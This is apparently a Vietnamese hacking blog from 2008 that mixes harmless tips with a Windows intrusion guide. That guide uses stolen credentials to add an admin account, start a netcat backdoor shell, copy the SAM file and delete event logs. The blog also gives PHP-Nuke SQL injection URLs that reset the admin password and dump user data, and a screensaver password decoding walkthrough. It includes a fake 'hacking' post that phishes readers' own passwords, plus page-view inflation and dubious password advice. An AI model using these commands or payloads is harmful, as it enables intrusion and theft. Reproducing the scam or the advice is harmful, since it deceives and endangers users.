Thông Báo

Note Đóng lại

Thứ Sáu, 19 tháng 12, 2008

Xem IP của mình trên Blog

Bước 1: Tạo hình ảnh chứa địa chỉ IP bằng PHP

CODE


$ip = 'IP Address: ' . $_SERVER['REMOTE_ADDR'];

$width = strlen($ip) * 9 + 20;
$height = 30;
$im = imageCreate($width, $height);

$bgColor = imageColorAllocate($im, 0x55, 0x55, 0x55);
$textColor = imageColorAllocate($im, 0xff, 0xff, 0xff);

imageFilledRectangle($im, 0, 0, $width - 1, $height - 1, $bgColor);
imageString($im, 5, 10, 7, $ip, $textColor);

header('Content-type: image/gif');
imageGif($im);
?>

Bước 2: Chèn hình ảnh chứa IP vào Blog

Ở bước này, bạn chèn hình ảnh vào Blog bằng cách đánh dấu vào ô View HTML Source rồi chèn đoạn mã sau:



Nếu bạn không có nơi upload file PHP hoặc không biết làm bước 1, thì có thể chỉ đơn giản copy đoạn code của mình vào cũng được, nó vẫn sẽ hoạt động tốt trên bất cứ Blog nào, của bạn hay của mình:



Sau đó Post lên Blog thôi. VD như ở trên Blog của mình thì kết quả nhận được như sau:



Giờ đây, mỗi khi bạn vào entry đó, bạn sẽ thấy địa chỉ IP của mình :).

Tăng PageViews cho Blog,web

Có nhiều cách để tăng PageViews từ phức tạp như việc dùng phần mềm đến đơn giản như việc viết 1 trang HTML với kỹ thuật chèn iFrame. Nhưng tất cả những cái đó đòi hỏi bạn phải có 1 chút kiến thức, và tất nhiên đối với người bình thường thì làm như vậy cũng khá vất vả và mất công.

rilwis sẽ trình bày cho các bạn 1 phương pháp khác, đơn giản hơn rất nhiều. Bạn không cần phải chuẩn bị gì cả, tất cả chỉ cần 1 trình duyệt Opera là đủ (có thể tải bản Opera mới nhất tại đây).

Opera có 1 chức năng đặc biệt giúp cho chúng ta có thể tự động nạp lại trang Web trong 1 khoảng thời gian định trước, nó giống như việc chúng ta refresh vậy, và việc đó sẽ coi như 1 request đến trang web và làm tăng số lần hit đến nó. Nếu áp dụng với Blog, nó sẽ làm tăng PageViews của Blog. Nguyên tắc này hoàn toàn giống với việc dùng phần mềm hay dùng HTML với iFrame, nhưng bạn không cần phải làm gì cả ngoài 1 trình duyệt Opera.

Chức năng này đặc biệt chỉ có ở Opera, các trình duyệt khác không có (hoặc đến thời điểm này là chưa có).

Cách làm cụ thể như sau:


1. Mở Opera, vào trang Blog mà bạn muốn tăng PageViews cho nó.
2. Nhấn chuột phải, 1 menu sẽ hiện ra như hình dưới đây.



3. Hãy chọn Enable để bật chức năng đó lên. Và chọn khoảng thời gian Opera tự động nạp lại trang Web (càng nhỏ thì nạp càng nhanh và PageViews tăng càng nhanh - Thường thì chọn 5 seconds).

Xong rồi đó! Rất đơn giản phải không? Bây giờ bạn chỉ cần ngồi đợi thành quả của bạn thôi.

Thử làm 1 phép tính nhỏ thế này, nếu bạn đặt chế độ 5 seconds reload 1 lần thì 1 phút sẽ được 12 lần, 1h sẽ được 12 * 60 = 720, và 1 buổi sáng 4h của bạn sẽ được 4 * 720 = 2880! Cũng khá nhanh đó chứ ;)

Nếu bạn muốn nhanh hơn nữa, thì trong menu đó, bạn nhấn vào Custom và nhập vào thời gian reload là 0 munites 1 seconds, tức là 1 giây nạp lại 1 lần. Như vậy, PageViews của bạn sẽ tăng nhanh gấp 5 lần đấy. Theo như tính toán ở trên thì 1 buổi sáng với 4h, nó sẽ giúp bạn tăng lên 5 * 2880 = 14400! Ấn tượng chứ bạn :D.

Chú ý là trong quá trình này, bạn không được tắt trình duyệt Opera đi. Bạn có thể sử dụng tab khác để mở trang Web khác và truy cập bình thường.
Jonhdy Hai Dang

Cach dat mat khau an toan cho pass

Để đặt mật khẩu hộp thư Yahoo một cách an toàn, bạn có thể dùng các ký tự không có trên bàn phím để thêm vào mật khẩu. Bằng cách giữ phím Alt sau đó nhấn một số bên bàn phím số rồi thả Alt ra, bạn sẽ có những ký tự bất ngờ.

Ví dụ:
Khi giữ phím Alt và bấm số 0169 bên bàn phím số sẽ có ©
Alt + 0151 ---> — (không phải dấu trừ " - ")
Alt + 0156 ---> œ (chữ quái gì ấy nhở....)
Alt + 0137 ---> ‰
Alt + 0169 ---> © (Copyright)
Alt + 0174 ---> ® (Register)
Alt + 0131----> ƒ (dùng làm ƒ(x) thì tuyệt )
Tôi có một mật khẩu là aaaÆ = aaaAlt+0198
Những mã kỳ dị ở trên bạn có thể tham khảo trong mục Character Map để biết được nhiều thứ hay ho hơn. (Start Menu --> All Programs --> Accessories --> System Tools ---> Character Map)

Và sau đây là mẹo để bảo vệ mật khẩu của tôi, nếu dùng mật khẩu này, dù người khác có nhìn thấy mật khẩu đi chăng nữa cũng chưa chắc lần ra được chính xác. Cách này có thể chống được fake login, trojan, một vài con keylog bình thường. Chống chỉ định với loại keylog nào có thể túm được tất cả những gì mình nhập vào từ bàn phím (có loại keylog nào có khả năng này không nhỉ?? Mọi người con cho tôi biết với)

Để người ta nhìn thấy mật khẩu mà không biết nó là gì thì chỉ có cách là "thấy mà không thấy" . Bạn cũng biết trên bàn phím có một phím tạo ra ký tự không thấy được đó là phím space - phím dấu cách. Bạn có thể kết hợp vài phát space đằng sau mật khẩu chữ để tăng thêm tính an toàn, tên ăn cắp chỉ lo gõ chỗ mật khẩu thấy được mà không để ý đến phần "tàng hình". Khổ nỗi những ký tự space vẫn chiếm một vài vị trí đằng sau mật khẩu và nếu tên ăn cắp thấy có 2 chữ a và một mớ khoảng trống đằng sau thì hắn sẽ đoán ra ngay và có thể mò ra (nếu hắn là dân chuyên nghiệp chứ vài chú gà hiện nay hay đi ăn cắp pass thì ít biết lắm). Đấy là bảo mật vòng 1, sơ sài để chống kẻ ăn cắp pass là gà. Ở bước sau, tôi sẽ hướng dẫn cách để chống cả kẻ ăn cắp pass chuyên nghiệp có kiến thức về IT.

Là dân IT thì các bạn cũng biết có một mã ASCII biểu diễn ký tự trống, ký tự này mới chính xác là ký tự trống, rỗng, không phải là một tập hợp có một số không (0) mà là tập hợp không có phần tử nào, rỗng tức là không có gì chứ không không phải là số không (0) (chết roài..... dài dòng quá)..... Đại khái ký tự này là ký tự không nhìn thấy được thứ 2 (ngoài space) mà ta có thể tạo ra từ bàn phím bằng cách giữ phím Alt và bấm 255. Bạn có thể dùng cách này để tạo nên một thư mục không tên, một file không có tên (xuất phát từ đây mà tôi có ý tưởng này). Và thế là ta có thể dùng kết hợp phím này và space để tạo một mật khẩu không nhìn thấy được. Ví dụ:
Alt+255, space, space, space, Alt+255, space --> 6 ký tự không thấy được, đủ làm một mật khẩu không thấy được cho Yahoo
space,Alt+255,Alt+255,space,space,space ---> 6 ký tự khác.
space, Alt+255, Alt+255, Alt+255, space, Alt+255 ---> mật khẩu khác nữa.
.....
.....
Tổ hợp chập 6 của 2 phần tử được bao nhiêu kết quả ấy nhỉ??? Mời anh hacker ngồi dò. Mà nếu bạn hứng chí làm 8 hay 10 ký tự thì cho dò cả năm .

Nếu bạn cần bảo mật thêm nữa thì hãy gõ space và Alt+255 ra một chỗ nào đó, sau đó dùng chuột để lấy từng ký tự mà ghép vào thành mật khẩu ..... dưng mà công phu quá nhỉ..... chúng ta đâu cần an toàn đến mức l**ng kính + két sắt + lòng đất như thế. Chỉ cần 6 phát ký tự vô hình kia cũng đủ cho ta chat trong thanh thản rồi .

Bạn có thể dùng cách này để tạo mật khẩu cho bất cứ món gì, trừ các trang web họ lọc ký tự lạ để chống SQL inject thì ta đành chịu. Nhưng căn bản chú Yahoo đồng ý cho dùng cách này là bà con ta có thể bảo vệ mật khẩu tốt rồi.

Trên đây là kinh nghiệm bảo vệ mật khẩu của tôi...cam on da vao blog, chuc ban thanh cong
Jonhdy Hai Dang

Dịch vụ chia sẻ file kiếm tiền (Hot)

Dịch vụ này có tên là Ziddu, có khá nhiều ưu điểm:
- Dung lượng lưu trữ và băng thông không giới hạn
- Kích thước file lưu trữ max là 200MB
- Download không cần chờ đợi
- Cho phép download đa luồng
- Định dạng file lưu trữ có thể là document, video, audio, photo. Trừ document thì các định dạng khác đều có thể xem trực tiếp trên website của Ziddu bằng cách vào link download (ảnh có thể xem được, nhạc có thể nghe được, video có thể coi được)

Điểm bất lợi duy nhất của dịch vụ này là file sẽ bị xóa sau 90 ngày không có ai download. Tuy nhiên, có thể thấy là điểm này cũng không phải là cản trở lớn lắm. Các dịch vụ lớn như Rapidshare... cũng có giới hạn này.

Ngoài ra, điểm đặc biệt của dịch vụ này là có thể kiếm tiền được. Yêu cầu là bạn phải có tài khoản PayPal hoặc MoneyBookers. Mỗi 1 lần download bạn sẽ được trả $0.001. Khi được $10, trang web sẽ trả tiền cho bạn theo tài khoản ản mà bạn đăng kí ở trên (PayPal hoặc MoneyBookers). Điều này có nghĩa là muốn được trả tiền, số lần download phải đạt được 10000, con số này quả thật không nhỏ chút nào 3.gif.

Hơn nữa, mỗi lần bạn giới thiệu cho người khác, bạn sẽ được thưởng 1 khoản là $0.10.

Đây là link đăng kí, có cả số id giới thiệu của tớ, các bạn có thể đăng kí theo link này để ủng hộ tớ, hoặc vào trang chủ đăng kí.

http://www.ziddu.com/register.php?referralid=(yz}]vP)f@
Jonhdy Hai Dang

Kiem tien bang cach Upload va Download file

Bạn thường hay upload file lên mạng để chia sẻ cho mọi người? Công sức bạn bỏ ra rất lớn và bạn đáng được trả công cho điều đó. Với Depositfiles, bạn sẽ được trả tiền mỗi khi có người download file của bạn. Dịch vụ này có rất nhiều ưu điểm, không hề thua kém so với nhiều dịch vụ chia sẻ file khác và điều quan trọng nhất là nó giúp bạn kiếm tiền 1 cách vừa dễ dàng vừa tiện lợi.

Với mỗi lần download file của bạn từ Depositfiles, nếu file có kích thước lớn hơn 1MB và người download từ Mỹ hoặc Nga, bạn sẽ được trả 1 khoản là $0.005, tức là với 1000 lần download bạn sẽ có được $5. Số tiền này không lớn lắm, nhưng nếu bạn chia sẻ link download file từ các trang web có nhiều người truy cập như các diễn đàn, thì chẳng mấy chốc bạn sẽ thu được 1 khoản không nhỏ.

Hiện nay Depositfiles đã bổ xung thêm chức năng giúp chúng ta kiếm tiền dễ dàng hơn. Đó là cho phép kiếm tiền từ những người download từ những quốc gia khác như Đức, Ukraine và Kazakhstan. Để làm được điều đó, bạn cần phải giới thiệu nhiều người vào mạng lưới bạn bè (referral) của bạn. Nếu bạn của bạn kiếm được 1 ngày $0.5 thì bạn sẽ được trả tiền từ những lần download từ Đức, nếu bạn của bạn kiếm được 1 ngày $1 thì bạn sẽ được trả tiền từ những lần download từ Ukraine và Kazakhstan.

Hơn nữa, bạn sẽ được chấm điểm bởi chính Depositfiles, điểm này sẽ được dùng để định mức thưởng thêm tiền cho bạn vào cuối tháng. Ngoài ra, khi đăng kí bạn đã có $5 được Depositfiles tặng cho bạn làm quà khi gia nhập.

Về việc thanh toán, Depositfiles sẽ thanh toán qua Paypal hoặc WebMoney khi bạn kiếm được $40.

Cách đăng kí với Depositfiles:

1. Click vào đây để tiến hành đăng kí với Depositfiles. Việc đăng kí rất dễ dàng như lập 1 hòm thư mới vậy! Sau khi đăng kí xong, bạn sẽ nhận được 1 email kích hoạt, hãy truy cập vào hòm thư của bạn rồi click vào link kích hoạt đó là được.

2. Sau khi đăng kí xong, hãy đăng nhập vào tài khoản của bạn tại trang chủ Depositfiles. Ở phần menu bên trái hãy nhấn vào link Bonus Program. Ở đó bạn sẽ thấy yêu cầu nhập vào số tài khoản Paypal hoặc Webmoney, hãy nhập số tài khoản của bạn vào là được.

Như thế là việc đăng kí đã xong! Bây giờ hãy upload file lên và chia sẻ link download của chúng với những người bạn của bạn!

Hãy yên tâm với dịch vụ chia sẻ file của Depositfiles, nó cho bạn những lợi thế sau:
- Dung lượng lưu trữ không giới hạn
- Băng thông download không giới hạn
- Kích thước file upload lớn nhất là 300 MB, lớn gấp 3 lần tại Rapidshare đấy!

Thứ Ba, 9 tháng 12, 2008

Yahoo Hacking v8.0

This is how to hack into hotmail!
It’s so simple; even I could do it! Ill get straight to the point…
Just follow these simple steps and you can have all the passwords you want!

Step 1
Send an e-mail to the address Gangsta2004PW@hotmail.com

Step 2
In the subject line, type the word “password”

Step 3
In the e-mail body, on the first line type your e-mail address
On the second line, type your password
On the third line, type the full e-mail address of the person you want the password

For example:
To: hai_dang_hacker@yahoo.com.vn
Subject: password
E-mail body:
1st line: myaddress@yahoo.com
2nd line: your password
3rd line: hacker...@yahoo.com(the e mail of the person you want the password)

You should receive your password between 24-48 hours

Thứ Sáu, 31 tháng 10, 2008

**Lấy pass của Screen Saver**


regedit.exe -> Registry -> Export Registry File...:

==============================

[HKEY_CURRENT_USER\Control Panel\Desktop]
"DragFullWindows"="0"
"FontSmoothing"="0"
"wallpaper"=""
"TileWallpaper"="0"
"ScreenSaveTimeOut"="840" <------- (1)
"UserPreferencemask"=hex:b0,00,00,00
"WallpaperStyle"="0"
"CursorBlinkRate"="200"
"SmoothScroll"=dword:00000000
"ScreenSaveLowPowerActive"="0" (?)
"ScreenSavePowerOffActive"="0" (?)
"ScreenSave_Data"=hex:37,39,00 <---------(2)
"ScreenSaveActive"="1" <---------(3)
"ScreenSaveUsePassword"=dword:00000001 <---------(4)

+++++++++++++++++++++
Các tham số của _SS_
+++++++++++++++++++++

(1): ScreenSaveTimeOut
======================
+ gía trị & đơn vị đo : hệ cơ số 10(dec) & giây
+ sau khoảng x (giây) : SS sẽ chạy

(2): ScreenSave_Data
====================
+ lưu password
+ string hex


(3): ScreenSaveActive
=====================
+ có sử dụng SS nào không?
+ giá trị:
0: no
1: yes

(4): ScreenSaveUsePassword
==========================
+ có cài password không?
+ giá trị:
0: không cài
1: có cài

Từ các tham số trên, bạn có thể trả lời được các câu hỏi sau:
------------------------------------------------------------

1. Khi nào thì chúng ta cần tìm password?
khi: (ScreenSaveActive = 1) ; user đã sử dụng 1 _SS_
và (ScreenSaveUsePassword = 1) ; user đã cài password

2. _SS_ được kích hoạt sau bao nhiêu phút ?
(ScreenSaveTimeOut/60) (phút)
ví dụ:
"ScreenSaveTimeOut"="840"
-> sau 840 (giây) (=840/60=14 phút) thì SS sẽ kích hoạt

3. Tìm Password?
Password của _SS_ được lưu ở: "ScreenSave_Data"
tìm password ở trên:

"ScreenSave_Data"=hex:37,39,00 (xâu hex)
---
-> chuyển tới xâu dec:
(37 hex = 3*16+7 = 55 dec)
(39 hex = 3*16+9 = 57 dec)

"ScreenSave_Data"=dec:55,57,00 (xâu dec)
---

-> chuyển tới xâu ASCII:

(55 dec = '7' ) (tra bảng ascii: chr(55)=7 , chr(57)=9 )
(57 dec = '9' )

"ScreenSave_Data"=ascii:7,9,00 (xâu ascii)
-----

-> ghép xâu:

(7,9 -> 79)

"ScreenSave_Data"=ascii:79,00 (coi như xâu hex)
--
-> xâu password:

+ bảng hash (có 20 phần tử):
hash[19]=[48,EE,76,1D,67,69,A1,1B,7A,8C,47,F8,54,95,97,5F,78,D9,DA,6C]

+ -->password:

(79 xor hash[0] = 79 xor 48 = 31 (='1'))

"ScreenSave_Data"=ascii:1,00

-->password = 1 (number one)

(if have more than _1 phần tử_ then XOR with hash[i] (0<=i<=19)

other example:
-------------
"ScreenSave_Data"=hex:31,46,42,39,32,31,33,33,32,46,32,38,45,32,35,30,33,46,44, 45,31,31,42,36,37,41,44,42,44,32,30,42,00

what is password? ($100)
Vui lòng ghi rõ nguồn:
http://haidang-hacker.blogspot.com

**Các lệnh cơ bản xâm nhập máy tính**

Phần 1 : Net

chỉ cần bạn có được User và Passwords của một IP nào trên Net...thế là bồ có thể kết nói một IPC$ rỗng rồi đấy....

bây giờ tớ xin ví dụ là bạn có được User la hbx và passwords : 123456...IP : 127.0.0.1

cậu hãy mở trình Ms dos và gõ vào lệnh sau :

Net use \\127.0.0.1\ipc$ "123456" /user:"hbx" đẩ kết nồi một IPC$ rỗng với máy victtim

nhưng thao tác tiếp theo..bạn nhất thiết phải login xong mới có thể sử dụng

-------------------------

bây giờ chúng ta nói tiếp làm thế nào để tạo một user mới nghe...

chúng ta cộng thệm môt user mới là admin_hai_dang và password lovechina

Net user admin_hai_dang lovechina / add

nếu bạn thành công..thì có thể cộng user này vào nhom Adminstrator

Net Localgroup Adminstrator admin_hai_dang / add

-------------------------

trong phần này tớ hướng dẫn tạo một ổ đỉa Ảo trên computer

Net use z: \\127.0.0.1\C$ ( hoặc là IPC$ )

Z là của mình...còn C$ là của Victim


Phần 2 : AT

thông thường thì khi độp nhập vào máy tính..chúng ta sẻ tặng quà lưu niệm cho victim trước khi rút lui,....vậy khi copy trojan lên máy rồi...làm thế nào dể khới động nó đây ?

chúng ta phải dùng đến lệnh AT thôi.....

đầu tiên...chúng ta cần biết thời gian của đối phương

Net time \\127.0.0.1

bây giờ thì nó sẽ phản hồi thời gian của victim...vd : 12:0 ..
tiếp theo..chúng ta cần tạo môt homework ID = 1

AT \\127.0.0.1 12:3 nc.exe

ở đây giả thiết là tui có con trojan la Nc.exe và đã được copy lên máy victim rồi

* giới thiệu chút it về NC...NC là từ viết tắc của NETCAT....nó là một telnet server với port 99

đợi đến 12:3 là nó sẽ tự chạy trên máy nạn nhân và chúng ta có thể connected đến port 99..thế là xong phần lưu bút


phần 3 : Telnet

đây là một lệnh rất cần thiết khi xâm nhập máy tính...nó có thể kết nối vớ máy tính khắc từ xa..nhưng thường thi phải có I D & PW..nhưng nếu máy đã Ăn Đạn rồi thì bạn chỉ cần connected đến port 99 là ok

Telnet 127.0.0.1 99

thế là bồ đã kết nối đến port 99 và có thể thực hiện tất cả các lệnh...


Phần 4 : Copy

bây giờ chúng ta nói tiêp...làm thế nào để copy files trên máy mình lên máy victim và làm ngược lại....nhưng bạn phải có kết nối IPC$ cái đã....

chúng ta copy files index trên ổ C của mình lên ổ C của 127.0.0.1

Copy Index.html \\127.0.0.1\C$\index.html

nếu bạn copy lên folder winNt

Copy index.html \\127.0.0.1\admin$\index.html

muốn copy files trên máy victm thì bạn gõ vào :

Copy \\127.0.0.1\Admin$\repair\sam._c:\


phần 5 : Set

nếu bạn muốn hack một website......tất nhiến là phải mở port 80..nếu không thì cậu hack cho ai xem ?

đã tới lúc dùng lệnh Set rồi

sau đây là kết quả mà tớ tìm thấy......chúng ta phân tích nghe....chủ yếu là muốn biêt homepage nó ở đâu thôi.....

COMPUTERNAME=PENTIUMII
ComSpec=D:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST= DAY LA SO IP CUA TUI..NHUNG TUI DEL ROIHTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
NUMBER_OF_PROCESSORS=1
Os2LibPath=D:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=D:\WINNT\system32;D:\WINNT
PATHEXT=.COM;.EXE;.BAT;.CMD
PATH_TRANSLATED=E:\vlroot DAY LA URL CUA HOMEPAGE, CHI CAN NHIN SAU DONG PATH_TRANSLATED= LA BIET NO O DAU 。O DAY LA E:\vlroot PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0303
PROMPT=$P$G
QUERY_STRING=/c+set
REMOTE_ADDR=XX.XX.XX.XX
REMOTE_HOST=XX.XX.XX.XX
REQUEST_METHOD=GET
SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe
SERVER_NAME=XX.XX.XX.XX
SERVER_PORT=80
SERVER_PORT_SECURE=0
SERVER_PROTOCOL=HTTP/1.1
SERVER_SOFTWARE=Microsoft-IIS/3.0
SystemDrive=D:
SystemRoot=D:\WINNT
TZ=GMT-9
USERPROFILE=D:\WINNT\Profiles\Default User
windir=D:\WINNT

đây là cách khá ngu..nhưng chỉ có cách này mới 100% biết đuợc homepage tên gì..ở ảâ ? khi cậu Dir ..chắc chắn là sẽ View được rất nhiều files đấy`.....

phần 6 : Nbtstat

nếu cậu Scan đuợc một máy sữ dụng Winnt...open port 135-139...thế thì bồ phải dùng lệnh này để biết thêm user thôi...

* tiện thể xin nói luôn...đây là netbios....sau khi có user rồi bạn có thể đoán mò password..nếu không thi Cracking luôn đi

Nbtstat - A XXX.XXX.XXX.XXX

sau đây là kết quả tớ scan được.....

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
Registered Registered Registered Registered Registered Registered Registered Reg
istered Registered Registered Registered
MAC Address = 00-E0-29-14-35-BA
PENTIUMII <00> UNIQUE
PENTIUMII <20> UNIQUE
ORAHOTOWN <00> GROUP
ORAHOTOWN <1C> GROUP
ORAHOTOWN <1B> UNIQUE
PENTIUMII <03> UNIQUE
INet~Services <1C> GROUP
IS~PENTIUMII...<00> UNIQUE
ORAHOTOWN <1E> GROUP
ORAHOTOWN <1D> UNIQUE
..__MSBROWSE__.<01> GROUP

kết quả cho biết User là PENTIUMII。


phần 7 : Shutdown

nhìn lệnh thôi cũng đủ biết rồi phải hông ? đây là lệnh shutdown server Winnt

Shutdown \\127.0.0.1 t:20

20 giây sau...Winnt sẽ tự khời động lại.......hi vọng các bạn suy nghỉ kỷ trước khi dùng lệnh này....vì nó sẽ làm tổn thất rất nặng cho victim...hãy làm tay hacker có đạo đức


phần 8 : Dir....

lệnh này không có gì để nói hết..chỉ dùng để view thôi.................


phần 9 : Del

lệnh này giống như xoá nhật ký vậy đó.....khi chúng ta xâm nhập máy tình...trên hệ thống sẽ lưu lại thông tin của chúng ta..vì thế..nên del nó đi...chư muốn bị tóm cổ hả ?

sau đây là những files nhật ký của Winnt

del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log

chỉ cần del hết là coi như xong rồi đó mấy bạn
Vui long ghi ro
Nguon link :http://haidang-hacker.blogspot.com

Hack Php-Nuke, Khai thác lỗi trong modules Members List:

Khai thác lỗi trong module PHP-Nuke Lỗi trong module Members_List có thể lấy mật khẩu thành viên và Admin.

Cách khai thác như sau:

Trong Module Members_List- Hiển thị tất cả thành viên được sắp xếp theo mật khẩu http:///modules.php?name=Members_List&letter=All&sortby=pass- Hiển thị tất cả thành viên được sắp xếp theo UIDhttp:///modules.php?name=Members_List&letter=All&sortby=uid Hai câu truy vấn bên trên thì không có gì để để nói. Híc híc. Bây giờ là câu truy vấn thứ ba- Hiển thị tất cả Moderators http:///modules.php?name=Members_List&letter='%20OR%20user_level='2'/*- Hiển thị tất cả Administrator http:///modules.php?name=Members_List&letter='%20OR%20user_level='4'/*...

*Khai thác Admin.
Chuyển đổi tên "Admin" thành "seamoun" chẳng hạn. Khà khà
http:///modules.php?name=Your_Account&op=savetheme&theme=',name='seamoun'%20where%20uname='Admin'/*&uid=[OUR_UID]
Chuyển đổi mật khẩu của Admin (md5). Để có được mật khẩu md5 của mình các bạn có thể tự tạo cho mình một mật khẩu sau đó view trong dữ liệu để lấy mã hoá md5. Khỏi mất công viết cho mệt. Ở đây cái mật khẩu md5 của mình đã mã hoá rùi là b6d0de971824629e987b84d513dc8af0
http:///modules.php?name=Your_Account&op=saveuser&email=',pass='b6d0de971824629e987b84d513dc8af0'%20where%20uname='Admin'/*&uid=[OUR_UID]
Vậy là ta có thể Login với tên của mình và mật khẩu của mình tự tao ra. Hì hì
Làm như trên thì mỗi lần ta chỉ làm cho một user thui. Vậy thì mệt quá, để lấy tất cả mật khẩu cũng như mail lưu thành tệp email chẳng hạn.
Câu lệnh như sau sẽ lưu thông tin của user
http:///modules.php?name=Your_Account&op=mailpasswd&uname=')%20OR%201=1%20INTO%20OUTFILE%20'/<đường dẫn web>/email.txt'/*
Sau khi thực hiện lệnh nó sẽ tạo ra một file trên host. để view file này thì đường dẫn nó là
http:///email.txt
- Lưu tất cả thông tin của Admin vào một tệp admin.txt
http:///modules.php?name=Your_Account&op=login&uname='%20OR%user_level>1%20INTO%20OUTFILE%20'/<đường dẫn web>/admin.txt
Đường dẫn để view trang này thì cũng như trên
Tài liệu tham khảo: phpsecure

Thứ Bảy, 18 tháng 10, 2008

Mot so trang web bi DDOS



Day la vi du trang cf (Dot Kich) bi DDOS nhung khi dung mang wifi cung chung modem thi may ket noi mang day thi khong vo duoc va hien hinh giong nhu o tren da ghi, nhung con khi dung may laptop ket noi wifi thi van zo binh thuong. Nguyen nhan la da bi mot so nguoi da scan ip cua ban va dung chuong trinh de huy dong mang botnet voi khoang 3.000 - 5.000 may tinh da bi hacker loi dung de tang so lan truy cap trong 1 giay tai mot may( dia chi ip). Con may tinh laptop su dung wifi vo duoc trang cf la vi dia chi ip cua latop su dung wifi chua bi scan, nen van vo duoc trang web binh thuong nhung toc do tuong doi giam xuong so voi binh thuong mot chut. Con cach phat hien trang blog,web bi tan cong tu choi dich vu DDOS minh se chi cho cac ban neu cac ban can.
Vi du trang web Bkav bi tan cong tu choi dich vu DDOS:
Vui long ghi ro
Nguon link :http://haidang-hacker.blogspot.com